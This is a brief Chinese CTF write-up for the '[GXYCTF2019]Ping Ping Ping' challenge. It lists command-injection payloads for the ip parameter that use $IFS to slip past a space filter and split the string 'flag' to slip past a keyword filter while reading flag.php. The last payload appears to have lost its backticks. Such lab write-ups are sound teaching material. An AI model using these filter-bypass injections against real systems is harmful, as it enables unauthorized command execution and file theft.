[GXYCTF2019]Ping Ping Ping
过滤了空格

?ip=127.0.0.1||ls$IFS$1-a

看到这个目录下面有个flag.php

直接读取发现flag被过滤了,用*发现*被过滤了,尝试使用字符串拼接的方式,但是依旧不行.....后来发现其实已经读出来了,在源代码里面,是我傻了

?ip=127.0.0.1;b=g;cat$IFS$1fla$b.php

这里看别的wp学到了一招?ip=127.0.0.1||cat$IFS$9ls,这样可以把ls出来的所有文件都读出来

标签: none

评论已关闭